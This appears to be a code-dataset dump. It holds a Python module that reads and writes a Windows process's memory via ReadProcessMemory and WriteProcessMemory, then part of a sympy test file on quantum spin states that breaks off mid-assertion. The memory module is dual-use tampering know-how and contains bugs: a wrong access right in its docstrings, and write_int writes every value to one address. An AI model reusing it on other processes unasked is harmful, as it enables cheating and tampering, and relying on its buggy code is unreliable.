|
a732405a12344b3cb8e42adade8f6bfb69be0435
|
[
"MIT"
] | null | null | null |
import ctypes
import rwmem.exception
def read_bytes(handle: int, address: int, bytes: int):
"""Read data from process memory.
Parameters:
-----------
handle: int
The handle to a process.
The handle must have the PROCESS_VM_OPERATION access right.
address: int
The process's pointer to be read.
bytes:
Number of bytes to be read.
Default is 100
Returns the raw value as bytes if succeeded.
"""
ascii = []
try:
read_buffer = ctypes.c_ubyte()
addr_buffer = ctypes.byref(read_buffer)
n_size = ctypes.sizeof(read_buffer)
lp_number_of_bytes_read = ctypes.c_ulong(0)
for i in range(bytes):
ctypes.windll.kernel32.ReadProcessMemory(handle, ctypes.c_void_p(address + i), addr_buffer, n_size, lp_number_of_bytes_read)
ascii.append(hex(read_buffer.value))
except (TypeError, ValueError, BufferError) as e:
raise rwmem.exception.WinAPIError(e) from e
else:
return ascii
def read_int(handle: int, address: int):
"""Read 4 bytes from process memory.
Parameters:
-----------
handle: int
The handle to a process.
The handle must have the PROCESS_VM_OPERATION access right.
address: int
The process's pointer to be read.
eturns the raw value as int if succeeded.
"""
try:
read_buffer = ctypes.c_uint()
addr_buffer = ctypes.byref(read_buffer)
n_size = ctypes.sizeof(read_buffer)
lp_number_of_bytes_read = ctypes.c_ulong(0)
ctypes.windll.kernel32.ReadProcessMemory(handle, ctypes.c_void_p(address), addr_buffer, n_size, lp_number_of_bytes_read)
except (TypeError, ValueError, BufferError) as e:
raise rwmem.exception.WinAPIError(e) from e
else:
return read_buffer.value
def read_float(handle: int, address: int):
"""Read 4 bytes from process memory.
Parameters:
-----------
handle: int
The handle to a process.
The handle must have the PROCESS_VM_OPERATION access right.
address: int
The process's pointer to be read.
eturns the raw value as float if succeeded.
"""
try:
read_buffer = ctypes.c_float()
addr_buffer = ctypes.byref(read_buffer)
n_size = ctypes.sizeof(read_buffer)
lp_number_of_bytes_read = ctypes.c_ulong(0)
ctypes.windll.kernel32.ReadProcessMemory(handle, ctypes.c_void_p(address), addr_buffer, n_size, lp_number_of_bytes_read)
except (TypeError, ValueError, BufferError) as e:
raise rwmem.exception.WinAPIError(e) from e
else:
return read_buffer.value
def read_double(handle: int, address: int):
try:
read_buffer = ctypes.c_double()
addr_buffer = ctypes.byref(read_buffer)
n_size = ctypes.sizeof(read_buffer)
lp_number_of_bytes_read = ctypes.c_ulong(0)
ctypes.windll.kernel32.ReadProcessMemory(handle, ctypes.c_void_p(address), addr_buffer, n_size, lp_number_of_bytes_read)
except (TypeError, ValueError, BufferError) as e:
raise rwmem.exception.WinAPIError(e) from e
else:
return read_buffer.value
def write_int(handle: int, address: int, value: str):
try:
for x in value:
write_buffer = ctypes.c_uint(int(x))
addr_buffer = ctypes.byref(write_buffer)
n_size = ctypes.sizeof(write_buffer)
lp_number_of_bytes_read = ctypes.c_ulong(0)
res = ctypes.windll.kernel32.WriteProcessMemory(handle, ctypes.c_void_p(address), addr_buffer, n_size, lp_number_of_bytes_read)
except (TypeError, ValueError, BufferError) as e:
raise rwmem.exception.WinAPIError(e) from e
else:
return bool(res)
def write_string(handle: int, address: int, value: str):
try:
write_buffer = ctypes.create_string_buffer(value.encode())
addr_buffer = ctypes.byref(write_buffer)
n_size = ctypes.sizeof(write_buffer)
lp_number_of_bytes_read = ctypes.c_size_t()
res = ctypes.windll.kernel32.WriteProcessMemory(handle, ctypes.c_void_p(address), addr_buffer, n_size, lp_number_of_bytes_read)
except (TypeError, ValueError, BufferError) as e:
raise rwmem.exception.WinAPIError(e) from e
else:
return bool(res)
| 36.697479
| 139
| 0.665216
| 589
| 4,367
| 4.70798
| 0.14601
| 0.042914
| 0.060945
| 0.064912
| 0.862604
| 0.846015
| 0.846015
| 0.802019
| 0.802019
| 0.789758
| 0
| 0.006687
| 0.246622
| 4,367
| 118
| 140
| 37.008475
| 0.83617
| 0.191665
| 0
| 0.708333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.083333
| false
| 0
| 0.027778
| 0
| 0.194444
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
24631535a0ca397a605dea5359e5e204ce0a2bcd
| 459,799
|
py
|
Python
|
sympy/physics/quantum/tests/test_spin.py
|
msgoff/sympy
|
1e7daef7514902f5e89718fa957b7b36c6669a10
|
[
"BSD-3-Clause"
] | null | null | null |
sympy/physics/quantum/tests/test_spin.py
|
msgoff/sympy
|
1e7daef7514902f5e89718fa957b7b36c6669a10
|
[
"BSD-3-Clause"
] | null | null | null |
sympy/physics/quantum/tests/test_spin.py
|
msgoff/sympy
|
1e7daef7514902f5e89718fa957b7b36c6669a10
|
[
"BSD-3-Clause"
] | null | null | null |
from sympy import cos, exp, expand, I, Matrix, pi, S, sin, sqrt, Sum, symbols, Rational
from sympy.abc import alpha, beta, gamma, j, m
from sympy.physics.quantum import hbar, represent, Commutator, InnerProduct
from sympy.physics.quantum.qapply import qapply
from sympy.physics.quantum.tensorproduct import TensorProduct
from sympy.physics.quantum.cg import CG
from sympy.physics.quantum.spin import (
Jx,
Jy,
Jz,
Jplus,
Jminus,
J2,
JxBra,
JyBra,
JzBra,
JxKet,
JyKet,
JzKet,
JxKetCoupled,
JyKetCoupled,
JzKetCoupled,
couple,
uncouple,
Rotation,
WignerD,
)
from sympy.testing.pytest import raises, slow
j1, j2, j3, j4, m1, m2, m3, m4 = symbols("j1:5 m1:5")
j12, j13, j24, j34, j123, j134, mi, mi1, mp = symbols(
"j12 j13 j24 j34 j123 j134 mi mi1 mp"
)
def test_represent_spin_operators():
assert represent(Jx) == hbar * Matrix([[0, 1], [1, 0]]) / 2
assert (
represent(Jx, j=1)
== hbar * sqrt(2) * Matrix([[0, 1, 0], [1, 0, 1], [0, 1, 0]]) / 2
)
assert represent(Jy) == hbar * I * Matrix([[0, -1], [1, 0]]) / 2
assert (
represent(Jy, j=1)
== hbar * I * sqrt(2) * Matrix([[0, -1, 0], [1, 0, -1], [0, 1, 0]]) / 2
)
assert represent(Jz) == hbar * Matrix([[1, 0], [0, -1]]) / 2
assert represent(Jz, j=1) == hbar * Matrix([[1, 0, 0], [0, 0, 0], [0, 0, -1]])
def test_represent_spin_states():
# Jx basis
assert represent(JxKet(S.Half, S.Half), basis=Jx) == Matrix([1, 0])
assert represent(JxKet(S.Half, Rational(-1, 2)), basis=Jx) == Matrix([0, 1])
assert represent(JxKet(1, 1), basis=Jx) == Matrix([1, 0, 0])
assert represent(JxKet(1, 0), basis=Jx) == Matrix([0, 1, 0])
assert represent(JxKet(1, -1), basis=Jx) == Matrix([0, 0, 1])
assert represent(JyKet(S.Half, S.Half), basis=Jx) == Matrix([exp(-I * pi / 4), 0])
assert represent(JyKet(S.Half, Rational(-1, 2)), basis=Jx) == Matrix(
[0, exp(I * pi / 4)]
)
assert represent(JyKet(1, 1), basis=Jx) == Matrix([-I, 0, 0])
assert represent(JyKet(1, 0), basis=Jx) == Matrix([0, 1, 0])
assert represent(JyKet(1, -1), basis=Jx) == Matrix([0, 0, I])
assert represent(JzKet(S.Half, S.Half), basis=Jx) == sqrt(2) * Matrix([-1, 1]) / 2
assert (
represent(JzKet(S.Half, Rational(-1, 2)), basis=Jx)
== sqrt(2) * Matrix([-1, -1]) / 2
)
assert represent(JzKet(1, 1), basis=Jx) == Matrix([1, -sqrt(2), 1]) / 2
assert represent(JzKet(1, 0), basis=Jx) == sqrt(2) * Matrix([1, 0, -1]) / 2
assert represent(JzKet(1, -1), basis=Jx) == Matrix([1, sqrt(2), 1]) / 2
# Jy basis
assert represent(JxKet(S.Half, S.Half), basis=Jy) == Matrix(
[exp(I * pi * Rational(-3, 4)), 0]
)
assert represent(JxKet(S.Half, Rational(-1, 2)), basis=Jy) == Matrix(
[0, exp(I * pi * Rational(3, 4))]
)
assert represent(JxKet(1, 1), basis=Jy) == Matrix([I, 0, 0])
assert represent(JxKet(1, 0), basis=Jy) == Matrix([0, 1, 0])
assert represent(JxKet(1, -1), basis=Jy) == Matrix([0, 0, -I])
assert represent(JyKet(S.Half, S.Half), basis=Jy) == Matrix([1, 0])
assert represent(JyKet(S.Half, Rational(-1, 2)), basis=Jy) == Matrix([0, 1])
assert represent(JyKet(1, 1), basis=Jy) == Matrix([1, 0, 0])
assert represent(JyKet(1, 0), basis=Jy) == Matrix([0, 1, 0])
assert represent(JyKet(1, -1), basis=Jy) == Matrix([0, 0, 1])
assert represent(JzKet(S.Half, S.Half), basis=Jy) == sqrt(2) * Matrix([-1, I]) / 2
assert (
represent(JzKet(S.Half, Rational(-1, 2)), basis=Jy)
== sqrt(2) * Matrix([I, -1]) / 2
)
assert represent(JzKet(1, 1), basis=Jy) == Matrix([1, -I * sqrt(2), -1]) / 2
assert (
represent(JzKet(1, 0), basis=Jy) == Matrix([-sqrt(2) * I, 0, -sqrt(2) * I]) / 2
)
assert represent(JzKet(1, -1), basis=Jy) == Matrix([-1, -sqrt(2) * I, 1]) / 2
# Jz basis
assert represent(JxKet(S.Half, S.Half), basis=Jz) == sqrt(2) * Matrix([1, 1]) / 2
assert (
represent(JxKet(S.Half, Rational(-1, 2)), basis=Jz)
== sqrt(2) * Matrix([-1, 1]) / 2
)
assert represent(JxKet(1, 1), basis=Jz) == Matrix([1, sqrt(2), 1]) / 2
assert represent(JxKet(1, 0), basis=Jz) == sqrt(2) * Matrix([-1, 0, 1]) / 2
assert represent(JxKet(1, -1), basis=Jz) == Matrix([1, -sqrt(2), 1]) / 2
assert represent(JyKet(S.Half, S.Half), basis=Jz) == sqrt(2) * Matrix([-1, -I]) / 2
assert (
represent(JyKet(S.Half, Rational(-1, 2)), basis=Jz)
== sqrt(2) * Matrix([-I, -1]) / 2
)
assert represent(JyKet(1, 1), basis=Jz) == Matrix([1, sqrt(2) * I, -1]) / 2
assert represent(JyKet(1, 0), basis=Jz) == sqrt(2) * Matrix([I, 0, I]) / 2
assert represent(JyKet(1, -1), basis=Jz) == Matrix([-1, sqrt(2) * I, 1]) / 2
assert represent(JzKet(S.Half, S.Half), basis=Jz) == Matrix([1, 0])
assert represent(JzKet(S.Half, Rational(-1, 2)), basis=Jz) == Matrix([0, 1])
assert represent(JzKet(1, 1), basis=Jz) == Matrix([1, 0, 0])
assert represent(JzKet(1, 0), basis=Jz) == Matrix([0, 1, 0])
assert represent(JzKet(1, -1), basis=Jz) == Matrix([0, 0, 1])
def test_represent_uncoupled_states():
# Jx basis
assert represent(
TensorProduct(JxKet(S.Half, S.Half), JxKet(S.Half, S.Half)), basis=Jx
) == Matrix([1, 0, 0, 0])
assert represent(
TensorProduct(JxKet(S.Half, S.Half), JxKet(S.Half, Rational(-1, 2))), basis=Jx
) == Matrix([0, 1, 0, 0])
assert represent(
TensorProduct(JxKet(S.Half, Rational(-1, 2)), JxKet(S.Half, S.Half)), basis=Jx
) == Matrix([0, 0, 1, 0])
assert represent(
TensorProduct(JxKet(S.Half, Rational(-1, 2)), JxKet(S.Half, Rational(-1, 2))),
basis=Jx,
) == Matrix([0, 0, 0, 1])
assert represent(
TensorProduct(JyKet(S.Half, S.Half), JyKet(S.Half, S.Half)), basis=Jx
) == Matrix([-I, 0, 0, 0])
assert represent(
TensorProduct(JyKet(S.Half, S.Half), JyKet(S.Half, Rational(-1, 2))), basis=Jx
) == Matrix([0, 1, 0, 0])
assert represent(
TensorProduct(JyKet(S.Half, Rational(-1, 2)), JyKet(S.Half, S.Half)), basis=Jx
) == Matrix([0, 0, 1, 0])
assert represent(
TensorProduct(JyKet(S.Half, Rational(-1, 2)), JyKet(S.Half, Rational(-1, 2))),
basis=Jx,
) == Matrix([0, 0, 0, I])
assert represent(
TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, S.Half)), basis=Jx
) == Matrix([S.Half, Rational(-1, 2), Rational(-1, 2), S.Half])
assert represent(
TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2))), basis=Jx
) == Matrix([S.Half, S.Half, Rational(-1, 2), Rational(-1, 2)])
assert represent(
TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half)), basis=Jx
) == Matrix([S.Half, Rational(-1, 2), S.Half, Rational(-1, 2)])
assert represent(
TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, Rational(-1, 2))),
basis=Jx,
) == Matrix([S.Half, S.Half, S.Half, S.Half])
# Jy basis
assert represent(
TensorProduct(JxKet(S.Half, S.Half), JxKet(S.Half, S.Half)), basis=Jy
) == Matrix([I, 0, 0, 0])
assert represent(
TensorProduct(JxKet(S.Half, S.Half), JxKet(S.Half, Rational(-1, 2))), basis=Jy
) == Matrix([0, 1, 0, 0])
assert represent(
TensorProduct(JxKet(S.Half, Rational(-1, 2)), JxKet(S.Half, S.Half)), basis=Jy
) == Matrix([0, 0, 1, 0])
assert represent(
TensorProduct(JxKet(S.Half, Rational(-1, 2)), JxKet(S.Half, Rational(-1, 2))),
basis=Jy,
) == Matrix([0, 0, 0, -I])
assert represent(
TensorProduct(JyKet(S.Half, S.Half), JyKet(S.Half, S.Half)), basis=Jy
) == Matrix([1, 0, 0, 0])
assert represent(
TensorProduct(JyKet(S.Half, S.Half), JyKet(S.Half, Rational(-1, 2))), basis=Jy
) == Matrix([0, 1, 0, 0])
assert represent(
TensorProduct(JyKet(S.Half, Rational(-1, 2)), JyKet(S.Half, S.Half)), basis=Jy
) == Matrix([0, 0, 1, 0])
assert represent(
TensorProduct(JyKet(S.Half, Rational(-1, 2)), JyKet(S.Half, Rational(-1, 2))),
basis=Jy,
) == Matrix([0, 0, 0, 1])
assert represent(
TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, S.Half)), basis=Jy
) == Matrix([S.Half, -I / 2, -I / 2, Rational(-1, 2)])
assert represent(
TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2))), basis=Jy
) == Matrix([-I / 2, S.Half, Rational(-1, 2), -I / 2])
assert represent(
TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half)), basis=Jy
) == Matrix([-I / 2, Rational(-1, 2), S.Half, -I / 2])
assert represent(
TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, Rational(-1, 2))),
basis=Jy,
) == Matrix([Rational(-1, 2), -I / 2, -I / 2, S.Half])
# Jz basis
assert represent(
TensorProduct(JxKet(S.Half, S.Half), JxKet(S.Half, S.Half)), basis=Jz
) == Matrix([S.Half, S.Half, S.Half, S.Half])
assert represent(
TensorProduct(JxKet(S.Half, S.Half), JxKet(S.Half, Rational(-1, 2))), basis=Jz
) == Matrix([Rational(-1, 2), S.Half, Rational(-1, 2), S.Half])
assert represent(
TensorProduct(JxKet(S.Half, Rational(-1, 2)), JxKet(S.Half, S.Half)), basis=Jz
) == Matrix([Rational(-1, 2), Rational(-1, 2), S.Half, S.Half])
assert represent(
TensorProduct(JxKet(S.Half, Rational(-1, 2)), JxKet(S.Half, Rational(-1, 2))),
basis=Jz,
) == Matrix([S.Half, Rational(-1, 2), Rational(-1, 2), S.Half])
assert represent(
TensorProduct(JyKet(S.Half, S.Half), JyKet(S.Half, S.Half)), basis=Jz
) == Matrix([S.Half, I / 2, I / 2, Rational(-1, 2)])
assert represent(
TensorProduct(JyKet(S.Half, S.Half), JyKet(S.Half, Rational(-1, 2))), basis=Jz
) == Matrix([I / 2, S.Half, Rational(-1, 2), I / 2])
assert represent(
TensorProduct(JyKet(S.Half, Rational(-1, 2)), JyKet(S.Half, S.Half)), basis=Jz
) == Matrix([I / 2, Rational(-1, 2), S.Half, I / 2])
assert represent(
TensorProduct(JyKet(S.Half, Rational(-1, 2)), JyKet(S.Half, Rational(-1, 2))),
basis=Jz,
) == Matrix([Rational(-1, 2), I / 2, I / 2, S.Half])
assert represent(
TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, S.Half)), basis=Jz
) == Matrix([1, 0, 0, 0])
assert represent(
TensorProduct(JzKet(S.Half, S.Half), JzKet(S.Half, Rational(-1, 2))), basis=Jz
) == Matrix([0, 1, 0, 0])
assert represent(
TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, S.Half)), basis=Jz
) == Matrix([0, 0, 1, 0])
assert represent(
TensorProduct(JzKet(S.Half, Rational(-1, 2)), JzKet(S.Half, Rational(-1, 2))),
basis=Jz,
) == Matrix([0, 0, 0, 1])
def test_represent_coupled_states():
# Jx basis
assert represent(JxKetCoupled(0, 0, (S.Half, S.Half)), basis=Jx) == Matrix(
[1, 0, 0, 0]
)
assert represent(JxKetCoupled(1, 1, (S.Half, S.Half)), basis=Jx) == Matrix(
[0, 1, 0, 0]
)
assert represent(JxKetCoupled(1, 0, (S.Half, S.Half)), basis=Jx) == Matrix(
[0, 0, 1, 0]
)
assert represent(JxKetCoupled(1, -1, (S.Half, S.Half)), basis=Jx) == Matrix(
[0, 0, 0, 1]
)
assert represent(JyKetCoupled(0, 0, (S.Half, S.Half)), basis=Jx) == Matrix(
[1, 0, 0, 0]
)
assert represent(JyKetCoupled(1, 1, (S.Half, S.Half)), basis=Jx) == Matrix(
[0, -I, 0, 0]
)
assert represent(JyKetCoupled(1, 0, (S.Half, S.Half)), basis=Jx) == Matrix(
[0, 0, 1, 0]
)
assert represent(JyKetCoupled(1, -1, (S.Half, S.Half)), basis=Jx) == Matrix(
[0, 0, 0, I]
)
assert represent(JzKetCoupled(0, 0, (S.Half, S.Half)), basis=Jx) == Matrix(
[1, 0, 0, 0]
)
assert represent(JzKetCoupled(1, 1, (S.Half, S.Half)), basis=Jx) == Matrix(
[0, S.Half, -sqrt(2) / 2, S.Half]
)
assert represent(JzKetCoupled(1, 0, (S.Half, S.Half)), basis=Jx) == Matrix(
[0, sqrt(2) / 2, 0, -sqrt(2) / 2]
)
assert represent(JzKetCoupled(1, -1, (S.Half, S.Half)), basis=Jx) == Matrix(
[0, S.Half, sqrt(2) / 2, S.Half]
)
# Jy basis
assert represent(JxKetCoupled(0, 0, (S.Half, S.Half)), basis=Jy) == Matrix(
[1, 0, 0, 0]
)
assert represent(JxKetCoupled(1, 1, (S.Half, S.Half)), basis=Jy) == Matrix(
[0, I, 0, 0]
)
assert represent(JxKetCoupled(1, 0, (S.Half, S.Half)), basis=Jy) == Matrix(
[0, 0, 1, 0]
)
assert represent(JxKetCoupled(1, -1, (S.Half, S.Half)), basis=Jy) == Matrix(
[0, 0, 0, -I]
)
assert represent(JyKetCoupled(0, 0, (S.Half, S.Half)), basis=Jy) == Matrix(
[1, 0, 0, 0]
)
assert represent(JyKetCoupled(1, 1, (S.Half, S.Half)), basis=Jy) == Matrix(
[0, 1, 0, 0]
)
assert represent(JyKetCoupled(1, 0, (S.Half, S.Half)), basis=Jy) == Matrix(
[0, 0, 1, 0]
)
assert represent(JyKetCoupled(1, -1, (S.Half, S.Half)), basis=Jy) == Matrix(
[0, 0, 0, 1]
)
assert represent(JzKetCoupled(0, 0, (S.Half, S.Half)), basis=Jy) == Matrix(
[1, 0, 0, 0]
)
assert represent(JzKetCoupled(1, 1, (S.Half, S.Half)), basis=Jy) == Matrix(
[0, S.Half, -I * sqrt(2) / 2, Rational(-1, 2)]
)
assert represent(JzKetCoupled(1, 0, (S.Half, S.Half)), basis=Jy) == Matrix(
[0, -I * sqrt(2) / 2, 0, -I * sqrt(2) / 2]
)
assert represent(JzKetCoupled(1, -1, (S.Half, S.Half)), basis=Jy) == Matrix(
[0, Rational(-1, 2), -I * sqrt(2) / 2, S.Half]
)
# Jz basis
assert represent(JxKetCoupled(0, 0, (S.Half, S.Half)), basis=Jz) == Matrix(
[1, 0, 0, 0]
)
assert represent(JxKetCoupled(1, 1, (S.Half, S.Half)), basis=Jz) == Matrix(
[0, S.Half, sqrt(2) / 2, S.Half]
)
assert represent(JxKetCoupled(1, 0, (S.Half, S.Half)), basis=Jz) == Matrix(
[0, -sqrt(2) / 2, 0, sqrt(2) / 2]
)
assert represent(JxKetCoupled(1, -1, (S.Half, S.Half)), basis=Jz) == Matrix(
[0, S.Half, -sqrt(2) / 2, S.Half]
)
assert represent(JyKetCoupled(0, 0, (S.Half, S.Half)), basis=Jz) == Matrix(
[1, 0, 0, 0]
)
assert represent(JyKetCoupled(1, 1, (S.Half, S.Half)), basis=Jz) == Matrix(
[0, S.Half, I * sqrt(2) / 2, Rational(-1, 2)]
)
assert represent(JyKetCoupled(1, 0, (S.Half, S.Half)), basis=Jz) == Matrix(
[0, I * sqrt(2) / 2, 0, I * sqrt(2) / 2]
)
assert represent(JyKetCoupled(1, -1, (S.Half, S.Half)), basis=Jz) == Matrix(
[0, Rational(-1, 2), I * sqrt(2) / 2, S.Half]
)
assert represent(JzKetCoupled(0, 0, (S.Half, S.Half)), basis=Jz) == Matrix(
[1, 0, 0, 0]
)
assert represent(JzKetCoupled(1, 1, (S.Half, S.Half)), basis=Jz) == Matrix(
[0, 1, 0, 0]
)
assert represent(JzKetCoupled(1, 0, (S.Half, S.Half)), basis=Jz) == Matrix(
[0, 0, 1, 0]
)
assert represent(JzKetCoupled(1, -1, (S.Half, S.Half)), basis=Jz) == Matrix(
[0, 0, 0, 1]
)
def test_represent_rotation():
assert represent(Rotation(0, pi / 2, 0)) == Matrix(
[
[
WignerD(S(1) / 2, S(1) / 2, S(1) / 2, 0, pi / 2, 0),
WignerD(S.Half, S.Half, Rational(-1, 2), 0, pi / 2, 0),
],
[
WignerD(S.Half, Rational(-1, 2), S.Half, 0, pi / 2, 0),
WignerD(S.Half, Rational(-1, 2), Rational(-1, 2), 0, pi / 2, 0),
],
]
)
assert represent(Rotation(0, pi / 2, 0), doit=True) == Matrix(
[[sqrt(2) / 2, -sqrt(2) / 2], [sqrt(2) / 2, sqrt(2) / 2]]
)
def test_rewrite_same():
# Rewrite to same basis
assert JxBra(1, 1).rewrite("Jx") == JxBra(1, 1)
assert JxBra(j, m).rewrite("Jx") == JxBra(j, m)
assert JxKet(1, 1).rewrite("Jx") == JxKet(1, 1)
assert JxKet(j, m).rewrite("Jx") == JxKet(j, m)
def test_rewrite_Bra():
# Numerical
assert JxBra(1, 1).rewrite("Jy") == -I * JyBra(1, 1)
assert JxBra(1, 0).rewrite("Jy") == JyBra(1, 0)
assert JxBra(1, -1).rewrite("Jy") == I * JyBra(1, -1)
assert (
JxBra(1, 1).rewrite("Jz")
== JzBra(1, 1) / 2 + JzBra(1, 0) / sqrt(2) + JzBra(1, -1) / 2
)
assert (
JxBra(1, 0).rewrite("Jz")
== -sqrt(2) * JzBra(1, 1) / 2 + sqrt(2) * JzBra(1, -1) / 2
)
assert (
JxBra(1, -1).rewrite("Jz")
== JzBra(1, 1) / 2 - JzBra(1, 0) / sqrt(2) + JzBra(1, -1) / 2
)
assert JyBra(1, 1).rewrite("Jx") == I * JxBra(1, 1)
assert JyBra(1, 0).rewrite("Jx") == JxBra(1, 0)
assert JyBra(1, -1).rewrite("Jx") == -I * JxBra(1, -1)
assert (
JyBra(1, 1).rewrite("Jz")
== JzBra(1, 1) / 2 - sqrt(2) * I * JzBra(1, 0) / 2 - JzBra(1, -1) / 2
)
assert (
JyBra(1, 0).rewrite("Jz")
== -sqrt(2) * I * JzBra(1, 1) / 2 - sqrt(2) * I * JzBra(1, -1) / 2
)
assert (
JyBra(1, -1).rewrite("Jz")
== -JzBra(1, 1) / 2 - sqrt(2) * I * JzBra(1, 0) / 2 + JzBra(1, -1) / 2
)
assert (
JzBra(1, 1).rewrite("Jx")
== JxBra(1, 1) / 2 - sqrt(2) * JxBra(1, 0) / 2 + JxBra(1, -1) / 2
)
assert (
JzBra(1, 0).rewrite("Jx")
== sqrt(2) * JxBra(1, 1) / 2 - sqrt(2) * JxBra(1, -1) / 2
)
assert (
JzBra(1, -1).rewrite("Jx")
== JxBra(1, 1) / 2 + sqrt(2) * JxBra(1, 0) / 2 + JxBra(1, -1) / 2
)
assert (
JzBra(1, 1).rewrite("Jy")
== JyBra(1, 1) / 2 + sqrt(2) * I * JyBra(1, 0) / 2 - JyBra(1, -1) / 2
)
assert (
JzBra(1, 0).rewrite("Jy")
== sqrt(2) * I * JyBra(1, 1) / 2 + sqrt(2) * I * JyBra(1, -1) / 2
)
assert (
JzBra(1, -1).rewrite("Jy")
== -JyBra(1, 1) / 2 + sqrt(2) * I * JyBra(1, 0) / 2 + JyBra(1, -1) / 2
)
# Symbolic
assert JxBra(j, m).rewrite("Jy") == Sum(
WignerD(j, mi, m, pi * Rational(3, 2), 0, 0) * JyBra(j, mi), (mi, -j, j)
)
assert JxBra(j, m).rewrite("Jz") == Sum(
WignerD(j, mi, m, 0, pi / 2, 0) * JzBra(j, mi), (mi, -j, j)
)
assert JyBra(j, m).rewrite("Jx") == Sum(
WignerD(j, mi, m, 0, 0, pi / 2) * JxBra(j, mi), (mi, -j, j)
)
assert JyBra(j, m).rewrite("Jz") == Sum(
WignerD(j, mi, m, pi * Rational(3, 2), -pi / 2, pi / 2) * JzBra(j, mi),
(mi, -j, j),
)
assert JzBra(j, m).rewrite("Jx") == Sum(
WignerD(j, mi, m, 0, pi * Rational(3, 2), 0) * JxBra(j, mi), (mi, -j, j)
)
assert JzBra(j, m).rewrite("Jy") == Sum(
WignerD(j, mi, m, pi * Rational(3, 2), pi / 2, pi / 2) * JyBra(j, mi),
(mi, -j, j),
)
def test_rewrite_Ket():
# Numerical
assert JxKet(1, 1).rewrite("Jy") == I * JyKet(1, 1)
assert JxKet(1, 0).rewrite("Jy") == JyKet(1, 0)
assert JxKet(1, -1).rewrite("Jy") == -I * JyKet(1, -1)
assert (
JxKet(1, 1).rewrite("Jz")
== JzKet(1, 1) / 2 + JzKet(1, 0) / sqrt(2) + JzKet(1, -1) / 2
)
assert (
JxKet(1, 0).rewrite("Jz")
== -sqrt(2) * JzKet(1, 1) / 2 + sqrt(2) * JzKet(1, -1) / 2
)
assert (
JxKet(1, -1).rewrite("Jz")
== JzKet(1, 1) / 2 - JzKet(1, 0) / sqrt(2) + JzKet(1, -1) / 2
)
assert JyKet(1, 1).rewrite("Jx") == -I * JxKet(1, 1)
assert JyKet(1, 0).rewrite("Jx") == JxKet(1, 0)
assert JyKet(1, -1).rewrite("Jx") == I * JxKet(1, -1)
assert (
JyKet(1, 1).rewrite("Jz")
== JzKet(1, 1) / 2 + sqrt(2) * I * JzKet(1, 0) / 2 - JzKet(1, -1) / 2
)
assert (
JyKet(1, 0).rewrite("Jz")
== sqrt(2) * I * JzKet(1, 1) / 2 + sqrt(2) * I * JzKet(1, -1) / 2
)
assert (
JyKet(1, -1).rewrite("Jz")
== -JzKet(1, 1) / 2 + sqrt(2) * I * JzKet(1, 0) / 2 + JzKet(1, -1) / 2
)
assert (
JzKet(1, 1).rewrite("Jx")
== JxKet(1, 1) / 2 - sqrt(2) * JxKet(1, 0) / 2 + JxKet(1, -1) / 2
)
assert (
JzKet(1, 0).rewrite("Jx")
== sqrt(2) * JxKet(1, 1) / 2 - sqrt(2) * JxKet(1, -1) / 2
)
assert (
JzKet(1, -1).rewrite("Jx")
== JxKet(1, 1) / 2 + sqrt(2) * JxKet(1, 0) / 2 + JxKet(1, -1) / 2
)
assert (
JzKet(1, 1).rewrite("Jy")
== JyKet(1, 1) / 2 - sqrt(2) * I * JyKet(1, 0) / 2 - JyKet(1, -1) / 2
)
assert (
JzKet(1, 0).rewrite("Jy")
== -sqrt(2) * I * JyKet(1, 1) / 2 - sqrt(2) * I * JyKet(1, -1) / 2
)
assert (
JzKet(1, -1).rewrite("Jy")
== -JyKet(1, 1) / 2 - sqrt(2) * I * JyKet(1, 0) / 2 + JyKet(1, -1) / 2
)
# Symbolic
assert JxKet(j, m).rewrite("Jy") == Sum(
WignerD(j, mi, m, pi * Rational(3, 2), 0, 0) * JyKet(j, mi), (mi, -j, j)
)
assert JxKet(j, m).rewrite("Jz") == Sum(
WignerD(j, mi, m, 0, pi / 2, 0) * JzKet(j, mi), (mi, -j, j)
)
assert JyKet(j, m).rewrite("Jx") == Sum(
WignerD(j, mi, m, 0, 0, pi / 2) * JxKet(j, mi), (mi, -j, j)
)
assert JyKet(j, m).rewrite("Jz") == Sum(
WignerD(j, mi, m, pi * Rational(3, 2), -pi / 2, pi / 2) * JzKet(j, mi),
(mi, -j, j),
)
assert JzKet(j, m).rewrite("Jx") == Sum(
WignerD(j, mi, m, 0, pi * Rational(3, 2), 0) * JxKet(j, mi), (mi, -j, j)
)
assert JzKet(j, m).rewrite("Jy") == Sum(
WignerD(j, mi, m, pi * Rational(3, 2), pi / 2, pi / 2) * JyKet(j, mi),
(mi, -j, j),
)
def test_rewrite_uncoupled_state():
# Numerical
assert TensorProduct(JyKet(1, 1), JxKet(1, 1)).rewrite("Jx") == -I * TensorProduct(
JxKet(1, 1), JxKet(1, 1)
)
assert TensorProduct(JyKet(1, 0), JxKet(1, 1)).rewrite("Jx") == TensorProduct(
JxKet(1, 0), JxKet(1, 1)
)
assert TensorProduct(JyKet(1, -1), JxKet(1, 1)).rewrite("Jx") == I * TensorProduct(
JxKet(1, -1), JxKet(1, 1)
)
assert (
TensorProduct(JzKet(1, 1), JxKet(1, 1)).rewrite("Jx")
== TensorProduct(JxKet(1, -1), JxKet(1, 1)) / 2
- sqrt(2) * TensorProduct(JxKet(1, 0), JxKet(1, 1)) / 2
+ TensorProduct(JxKet(1, 1), JxKet(1, 1)) / 2
)
assert (
TensorProduct(JzKet(1, 0), JxKet(1, 1)).rewrite("Jx")
== -sqrt(2) * TensorProduct(JxKet(1, -1), JxKet(1, 1)) / 2
